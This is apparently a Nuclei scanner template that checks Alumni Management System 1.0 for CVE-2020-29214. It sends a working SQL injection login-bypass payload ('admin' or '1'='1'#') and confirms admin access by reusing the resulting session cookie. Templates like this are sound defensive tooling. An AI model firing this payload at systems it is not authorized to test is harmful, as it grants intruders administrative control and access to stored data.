id: alumni-management-sqli

info:
  name: Alumni Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Alumni Management System 1.0 contains a SQL injection vulnerability via admin/login in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/48883
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29214
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 2
  tags: sqli,auth-bypass,cms,edb,alumni

http:
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
      - |
        GET /admin/index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Welcome back Admin!'
          - 'Alumni List'
        condition: and

      - type: word
        part: body
        words:
          - '#login-form'
        negative: true

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100edaf92edaa54da048585bc0ba8c28379737ecfd51737d6c822b583062d52f67402206bfc32f0251696197494774368b535e8862f832b4df516669ef20b5d912cb413:922c64590222798bb761d5b6d8e72950
